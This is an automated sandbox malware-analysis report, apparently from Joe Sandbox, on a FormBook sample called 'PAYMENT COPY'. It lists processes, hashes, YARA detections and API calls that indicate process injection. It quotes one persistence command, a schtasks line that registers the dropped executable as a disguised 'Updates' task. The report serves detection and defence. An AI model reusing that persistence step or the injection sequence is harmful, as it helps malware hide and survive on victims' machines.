Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:19:41
Start date:	27/05/2024
Path:	C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
Imagebase:	0xa30000
File size:	704'000 bytes
MD5 hash:	A05649B0D742E857FC002AC0B7759512
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:19:43
Start date:	27/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7b93d0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:19:44
Start date:	27/05/2024
Path:	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe"
Imagebase:	0xc50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:19:46
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\gpresult.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\gpresult.exe"
Imagebase:	0xee0000
File size:	190'464 bytes
MD5 hash:	8201D5447D15345B8B1A7B9B1493EC85
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	06:19:46
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"
Imagebase:	0x40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:19:46
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:19:46
Start date:	27/05/2024
Path:	C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Imagebase:	0x570000
File size:	704'000 bytes
MD5 hash:	A05649B0D742E857FC002AC0B7759512
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:19:51
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\gpresult.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\gpresult.exe"
Imagebase:	0xee0000
File size:	190'464 bytes
MD5 hash:	8201D5447D15345B8B1A7B9B1493EC85
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:20:06
Start date:	27/05/2024
Path:	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe"
Imagebase:	0xc50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	06:20:19
Start date:	27/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6b1600000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	199
Total number of Limit Nodes:	10

Executed Functions

Function 06DB6F9B Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b48e04caaa143aa91e3e24af0197d2e5c89c72e1c89c8d007937ccb05450fa9
Instruction ID: 77166d6ce5368fa872d74e6fc28eaecb062ba8a9f955f0bc5c1687a75a9af32c
Opcode Fuzzy Hash: 6b48e04caaa143aa91e3e24af0197d2e5c89c72e1c89c8d007937ccb05450fa9
Instruction Fuzzy Hash: 40310E74D09208CFEB44CFA6D5447EDFBFAAB89300F14B02AD01AA7248DB758505CFA4

Function 06DB981C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1782be02178500f0a2ab6587af0d98e436e7c50f20ea358046bf552021132735
Instruction ID: 7bf7a991413ca0221d3408a010dd7d22fb1d998ae506dbb725834c5799ff4d43
Opcode Fuzzy Hash: 1782be02178500f0a2ab6587af0d98e436e7c50f20ea358046bf552021132735
Instruction Fuzzy Hash: 22D06C74C0A298CED790DF50D8946F8B7B9AB0B350F04B095969BA721AD670E9808F98

Function 06DB63EC Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DB662E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 583bb82beebb7bde45f6c52b1789c07b6b4da18a9365a51fd006de44da9e255a
Instruction ID: 449513a08df16deb15635bd7ef742600d7bdc6f9e112a78323d707aebd7412c1
Opcode Fuzzy Hash: 583bb82beebb7bde45f6c52b1789c07b6b4da18a9365a51fd006de44da9e255a
Instruction Fuzzy Hash: 96A16A71D00659DFEB64CF68C840BEDBBF2BF48314F1485A9E80AA7248DB749985CF91

Function 06DB63F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DB662E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7186eee5811323c31219bee9a4699ec733fbc0b04619963b854a3c9529c45f2b
Instruction ID: 5023850a77d9c9d4f00cb07fb360924e6659478c99dd6b7ddaf3b3982ccd67b1
Opcode Fuzzy Hash: 7186eee5811323c31219bee9a4699ec733fbc0b04619963b854a3c9529c45f2b
Instruction Fuzzy Hash: 93916971D00659CFEB54CF68C850BEDBBF2BF48314F1485A9E80AA7288DB749985CF91

Function 0111ACE8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0111AF3E

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 93e28633975f5abf882fd7e118306643fd677bd790f57295364293799169a153
Instruction ID: 4b94f9a1fd05df5bed668a792be236917682341be2ff5075549dbafb048dd7c9
Opcode Fuzzy Hash: 93e28633975f5abf882fd7e118306643fd677bd790f57295364293799169a153
Instruction Fuzzy Hash: F97157B0A01B458FDB28DF29E45475ABBF1FF48304F008A2DD58AD7A44DB34E94ACB91

Function 011144C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011159A9

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 10733c2426f1e6dedd36529e5112bbf084af140d42d4557904e14ac67a73da1b
Instruction ID: a5b7464b1820fb83f7301b9eb928f993a773f69c5c0a0030ba0c38c487266e4f
Opcode Fuzzy Hash: 10733c2426f1e6dedd36529e5112bbf084af140d42d4557904e14ac67a73da1b
Instruction Fuzzy Hash: 9541E370C0071DCBEB24DFAAC884B9DFBB6BF89304F10816AD408AB255D7716946CF51

Function 011158EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011159A9

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 45f673def00199eff40846c008a4396e982d99b9662743228703b54a611ce91a
Instruction ID: e9034453b76b96b4e56dd6ca5c3048d32157791f4a176f2516d1547bcb02c776
Opcode Fuzzy Hash: 45f673def00199eff40846c008a4396e982d99b9662743228703b54a611ce91a
Instruction Fuzzy Hash: F441FF70C0071DCBEB24DFA9D884B9DFBB2BF89304F20816AD408AB255DB756946CF51

Function 06DB5D68 Relevance: 1.6, APIs: 1, Instructions: 90
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DB5E00

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4bb381265be44271b477e453509e5ad2a305d2436d66effdaa01af05b4beb13e
Instruction ID: 35463b1623b095f72ce76b4292c8d2277e35ef6bae582775f63a7f77bd7047c8
Opcode Fuzzy Hash: 4bb381265be44271b477e453509e5ad2a305d2436d66effdaa01af05b4beb13e
Instruction Fuzzy Hash: 8A313676900209CFDB10CFA9D884BDEBBF1FF88310F10892AE959A7240D7789954CBA0

Function 06DB5D70 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DB5E00

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d041b379c4a72225d3f552594d03e264c5845e3b2937b0885bd4da5dd27fdd4c
Instruction ID: 16fc38ff2475a8ab73aba9e575cb63d9c1252677b1df4cf96da9371276039bec
Opcode Fuzzy Hash: d041b379c4a72225d3f552594d03e264c5845e3b2937b0885bd4da5dd27fdd4c
Instruction Fuzzy Hash: CE2124B1900349DFDB10DFAAD885BDEBBF5FF48310F10852AE919A7240D7789954CBA1

Function 06DB5798 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DB581E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0d23e112f60602ff3d0fe7d4b1d761f6478e80aafb3c1e1a4ca72f765c84792c
Instruction ID: 950916c2cdd03815cf6d51ec49f693f0d9edc4571bf9186811e0dade2eb50286
Opcode Fuzzy Hash: 0d23e112f60602ff3d0fe7d4b1d761f6478e80aafb3c1e1a4ca72f765c84792c
Instruction Fuzzy Hash: D8212575D00309CFDB50DFAAD484BEEBBF4AF48314F14842AD559A7240D7789945CFA1

Function 06DB5E5B Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DB5EE0

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4e5bd81d32cebf6b9a4119b7407df584c8493788ecf7eb0e083de392f28bfe1b
Instruction ID: c11f5f49a0edf411f068d67aab505444b9cd488eefaad5304e837218ebd94b35
Opcode Fuzzy Hash: 4e5bd81d32cebf6b9a4119b7407df584c8493788ecf7eb0e083de392f28bfe1b
Instruction Fuzzy Hash: E4212571C01309DFDB10DFAAD884BDEBBF4BF48310F50842AE919A7240C7389945CBA1

Function 0111D1BC Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0111D596,?,?,?,?,?), ref: 0111D657

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1f350cd67d7866356cb64e656ac5ef9bd04c9a7175cb78308c76f9f730333798
Instruction ID: 717992322b62e073063d3313d90634fa5058f1ea9f5b384b9b8c39297d3a3ea3
Opcode Fuzzy Hash: 1f350cd67d7866356cb64e656ac5ef9bd04c9a7175cb78308c76f9f730333798
Instruction Fuzzy Hash: A421D4B5900248DFDB10CF9AD584ADEFBF4EB48310F14841AE918A7350D374A954CFA5

Function 06DB5E60 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DB5EE0

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 52d79937a00faee642a3a197f91d9ba0d6fbad944aad0b7197ac3fb9d10bdd4c
Instruction ID: 813a2a87fa7af2be9e9bac5dd9378668fec1243efb70d12e6ea3f882e6444653
Opcode Fuzzy Hash: 52d79937a00faee642a3a197f91d9ba0d6fbad944aad0b7197ac3fb9d10bdd4c
Instruction Fuzzy Hash: C2211471C00349DFDB10DFAAD884BEEBBF5BF48310F50842AE919A7240D7799945CBA1

Function 06DB57A0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DB581E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 860545f75ffdeadf04d7eed5f47afa0c65f8f2bbe4993cf975a3533638b57035
Instruction ID: 25d6a20e303ac8b037858814ee69fb49c3c11e3a8daecab575cd7059343052b5
Opcode Fuzzy Hash: 860545f75ffdeadf04d7eed5f47afa0c65f8f2bbe4993cf975a3533638b57035
Instruction Fuzzy Hash: AA212475D00309CFDB50DFAAD884BEEBBF4AF88314F14842AD919A7240D778A945CFA5

Function 0111D5C8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0111D596,?,?,?,?,?), ref: 0111D657

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b5a2fb2a3fcf622985c417d7f4f0dfdef30c0ad8cf8f5ee4dd14048e73e2e34f
Instruction ID: dbb9e9f156d4364b7ca967828c03fcbae9ab3233973c303b7b14029ffb586315
Opcode Fuzzy Hash: b5a2fb2a3fcf622985c417d7f4f0dfdef30c0ad8cf8f5ee4dd14048e73e2e34f
Instruction Fuzzy Hash: BB2114B5800208DFDB10CFAAD584AEEBBF4FB08310F14841AE918B3250D378A945CF65

Function 06DB5CA8 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DB5D1E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a787597ae99826cdca621ec52ea37a8301bfa2f9aaf2384f73b85919504849e3
Instruction ID: 72a9c40463cacf984d83dc9f47a5f2a3619e94ec224c1bd07d64b17c07938777
Opcode Fuzzy Hash: a787597ae99826cdca621ec52ea37a8301bfa2f9aaf2384f73b85919504849e3
Instruction Fuzzy Hash: 8E112671900349DFDB10DFAAE844BDEBBF5AF88320F14891AE516A7250C779A944CBA1

Function 0111A070 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0111AFB9,00000800,00000000,00000000), ref: 0111B1CA

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8a0e17aee2d4ce6669a4d834f759837f43c945ed9402556e14c4aa3b450d9560
Instruction ID: 3b9905ba90ea3581874d8b6de402f953dca88db74c1b92362754dec0201444b0
Opcode Fuzzy Hash: 8a0e17aee2d4ce6669a4d834f759837f43c945ed9402556e14c4aa3b450d9560
Instruction Fuzzy Hash: B61117B5904249CFDB14CF9AD884B9EFBF4EB48310F11842AE515B7240C375A545CFA5

Function 06DB56E8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DB5752

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e9e43cdf2936aabb15c309a3dd8168d4b1c8fc8ad541db83535d80ddb6a6a4e7
Instruction ID: 1583a65d37c472476a3fc5427e397f83a61984abec543b3aa62bb50cb2307bd2
Opcode Fuzzy Hash: e9e43cdf2936aabb15c309a3dd8168d4b1c8fc8ad541db83535d80ddb6a6a4e7
Instruction Fuzzy Hash: 5B116770D00308CBDB10EFAAD84479EBBF4AF88310F20881AD569A7240C7756945CF90

Function 06DB5CB0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DB5D1E

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a3ebde5c20753edbc9002d3f3515c5beef905f4f3107559c50352544762ef4f9
Instruction ID: 42a6379ee3d6490b804c366853adea8b38f6442bd8b6434b756ea78cfb619bd2
Opcode Fuzzy Hash: a3ebde5c20753edbc9002d3f3515c5beef905f4f3107559c50352544762ef4f9
Instruction Fuzzy Hash: 80113471800249DFDB10DFAAE848BDFBBF5AF88310F14881AE519A7250C779A944CFA1

Function 0111B159 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0111AFB9,00000800,00000000,00000000), ref: 0111B1CA

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2404768a9a6d672aa2ca8ae8a3601d5be43e1d5626bc961bf3aaf1b71dd1590f
Instruction ID: 1a010472992a85b663742c7772cc6052f94983315f1c7321110fcb764cc44e87
Opcode Fuzzy Hash: 2404768a9a6d672aa2ca8ae8a3601d5be43e1d5626bc961bf3aaf1b71dd1590f
Instruction Fuzzy Hash: 691100B6800209CFDB14CFAAD984B9EFBF4AF48310F15852AD519B7200C378A545CFA5

Function 06DB56F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DB5752

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9315325bffcdea317c278506b04648e62438685d36c2abff2f87b77329f14f83
Instruction ID: 046d065d0d15ce86bbb0e0956e65cc3bff6552c0207f862af33d8fb09982fd99
Opcode Fuzzy Hash: 9315325bffcdea317c278506b04648e62438685d36c2abff2f87b77329f14f83
Instruction Fuzzy Hash: 2D113671D00349CFDB10DFAAD8847DEFBF5AF88314F24841AD51AA7240C779A945CBA5

Function 06DBA790 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DBA7F5

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

